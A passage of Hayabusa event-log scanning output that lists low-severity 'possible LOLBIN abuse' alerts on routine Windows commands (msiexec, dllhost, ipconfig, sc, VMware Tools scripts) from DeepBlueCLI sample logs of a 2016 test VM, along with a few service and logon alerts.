C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:48:46.838 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:48:47.001 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:49:56.148 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:49:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-09-03 23:49:59.727 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:03.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:03.998 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:11.414 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:11.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:23.151 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:23.337 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:37.272 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:37.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:52:34.610 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe 
| PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:52:34.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:53:22.275 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:53:22.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:53:23.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 00:52:11.006 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:19:44.532 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:19:44.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:19:44.692 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:21:44.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:27:33.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:34:52.733 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:34:54.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:14.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:35:15.773 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:35:16.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:35:29.507 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:35:29.601 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:35:40.667 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 0x60b6f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:35:46.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: 
C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:36:24.719 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:36:26.520 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:48:30.867 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 07:57:17.289 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 
07:57:39.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 08:03:14.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 08:03:14.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:04.123 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:05.218 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:05.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:05.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:15.400 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:23.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 23:37:56.230 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd 
Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 23:37:59.307 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 23:39:22.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 23:39:28.137 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-05 00:10:41.119 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-05 00:10:41.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 11:13:20.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 11:13:20.122 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 11:13:21.221 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 11:13:21.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 11:13:30.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 12:28:48.887 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 12:28:49.170 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 23:50:16.005 